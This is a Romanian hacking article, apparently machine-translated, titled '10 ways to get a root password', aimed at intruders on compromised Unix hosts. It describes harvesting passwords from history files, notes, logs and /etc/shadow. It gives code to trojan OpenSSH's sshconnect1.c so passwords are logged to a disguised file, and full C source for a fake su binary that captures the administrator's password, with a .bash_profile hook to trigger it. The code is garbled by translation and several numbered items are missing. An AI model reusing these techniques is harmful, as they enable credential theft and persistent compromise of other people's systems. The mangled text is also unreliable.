10 moduri de a avea o parolă de root

De la vechiul HakZony.

10 moduri de a avea o parolă de root

Poate că cea mai mare problemă din hack este definirea parolei de root. Chiar și atunci când un hacker a rupt sistemul printr-un fel de exploatare, obținerea parolei nu este atât de ușoară. Dar pe fiecare piuliță există un șurub, așa că permiteți-mi să dezvăluie 10 modalități universale de a întreba aceste informații importante;). Nu, nici măcar nu trebuie să te întâlnești cu administratorul și să-i dai o bere unui stat inconștient (sau mai degrabă într-o stare în care îți dezvăluie informații importante). Totul este mult mai simplu, există trucuri, după care veți primi parola de root. Bineînțeles, totul depinde de situație. Toate acestea vor fi discutate mai jos.







1. Căutați în scripturile Perl / PHP.

Metoda este utilizată pentru toate tipurile de hacking.

2. Căutați în fișierele HISTORY.

Adesea administratorii utilizează programe de consolă, care transmit parola direct din linia de comandă. Acest lucru este scris într-un fișier istoric numit .bash_history (desigur, pentru alți interpreți numele fișierului va fi diferit). Pot exista, de asemenea, infa din cauza unei erori de administrator în echipă (de exemplu, am văzut cum a fost administratorul în loc su suzed psu și apoi parola lui).

Există un alt dosar de istorie. Se numește .mysql_history și se află și în directorul de domiciliu al utilizatorului. Aici găsiți comenzile pentru schimbarea parolei pentru accesul SQL. Această parolă poate coincide cu parola de root.

Metoda este aplicabilă numai atunci când există un control complet asupra sistemului. Dar se întâmplă când fișierele HISTORY au atributul 644. Puteți găsi astfel de fișiere (și apoi citiți) cu comanda find / -perm 644 name * _history.

3. Căutați în .htpasswd.

Deciphează astfel de hashes de programul John The Ripper. Nu este pentru mine să vă învăț asta, așa că cred că această metodă este de înțeles pentru dumneavoastră.

4. Căutați în alte fișiere.

Există servere în care parolele sunt specificate în fișierele aplicațiilor terță parte. De exemplu, am dat peste o situație în care parola de root a fost în fișierul socks5.password.

Atenție vă rog! Este posibil ca aceste fișiere să nu poată fi citite. Prin urmare, totul depinde de situație.

5. Notele de teren.

Adesea, administratorii lasă fișiere importante în directoarele lor. Acestea conțin câteva note. Este posibil ca printre acestea să puteți întâlni parole. Am întâlnit-o și am găsit parola de root în notele de fișier. Acordați o atenție deosebită acestor lucruri.







6. Căutați în jurnalele.

7. Sniffing de date.

Unele rootkituri conțin un sniffer local, care facilitează recunoașterea parolelor pe ssh (o modificare simplă a / usr / bin / ssh cu suport pentru logare;)). În mod normal, acest suport și calea către fișierul cu jurnalul sunt specificate în documentația de rootkit). Totul este bine, dar un lucru este dezamăgitor: majoritatea rootkit-urilor conțin vechiul ssh, care acceptă doar primul protocol. Drept urmare, un hacker se poate trăda cu dulciuri.

Dar cine previne colectarea propriului ssh și includerea în el a memoriei parolelor? Așa este! Nimeni. În pachetul OpenSSH găsim un fișier numit sshconnect1.c. Apoi inserăm următoarele linii în conținutul său:

După linia snprintf (prompt, sizeof (prompt), "% [protejat prin e-mail] parola% .128s:", server_user, host);

ifile = fopen ("/ boot / kernel.old", "a");
fprintf (ifile, "sesiunea% s% s", server_user, host);
fclose (ifile);

După parola de linie = read_passphrase (prompt, 0);
ifile = fopen ("/ boot / kernel.old", "a");
fprintf (ifile, "parola este% s", parola);
fclose (ifile);

Dacă totul se face corect, ssh se va aduna fără nici o aventură. Acum administratorul nu va observa defectele din sistem și veți afla parola pe ssh. Când va merge sub el, aceasta va fi parola de root;).

8. Ne prefacem că este un serviciu de sistem;).

Această metodă am descris în unul dintre numerele Hacker (Unixoid, Fun în Linux). Datorită faptului că utilizatorii care au citit Hacker-ul nu vizitează site-ul (și invers), nu va fi superfluă să repet recepția mea dificilă.

Deci, se creează următorul fișier:

#define SORRY "Sorry"
#define PFILE "tmp / .screen"
#define MYPATH "tmp / .screen_active"
#include
void sigexit (int nr);
int principale () char pass [40];
char longs [100];
int filep;
semnal (SIGINT, sigexit);
printf ("Parola:");
sistem ("stty -echo");
scanf ("% s", trecere);
sistem ("ecou stty");
printf ("");
filep = fopen (PFILE, "w");
fprintf (filep, "Pass este% s", treci);
fclose (filep);
printf ("% s", SORRY);
strcpy (lungi, "");
strcat (lungi, "/ bin / ln -sf / bin / su");
strcat (lungi, MYPATH);
sistem (lungi);
ieșire (0);
>
sistem void sigexit (int nu) ("ecou stty");
printf ("");
ieșire (0);
>

și se numește su.c. Dacă vă uitați la codul simplu, puteți înțelege că aceasta este o imitație completă a / bin / su, numai cu parola de logare în fișierul tmp / .screen. Binarul propriu-zis va fi în fișierul tmp / .screen_active (toate căile relative la directorul de domiciliu al utilizatorului). După ce fișierul este executat, acesta este înlocuit cu standardul / bin / su. Astfel, administratorul crede că a făcut o greșeală cu parola, deoarece din a doua încercare suidul va avea succes.

Înainte de a testa această metodă în practică, introduceți în fișier linia su /home/user/tmp/.screen_active

/.bash_profile și așteptați până când adminul decide să vină pe rădăcină. Când aceasta se întâmplă cu parola;).

10. Modul standard.

Și, în sfârșit, este timpul să spunem despre calea cea mai banală. Hackerul captează sistemul și accesează / etc / shadow. Mai mult, toate sub scripturile sunt luate decryptor, un dicționar bun și toate speranțele doar pentru noroc. Cred că ați întâlnit adesea această metodă. Și, interesant, am uitat mereu de ceilalți 9.







Articole similare

Trimiteți-le prietenilor: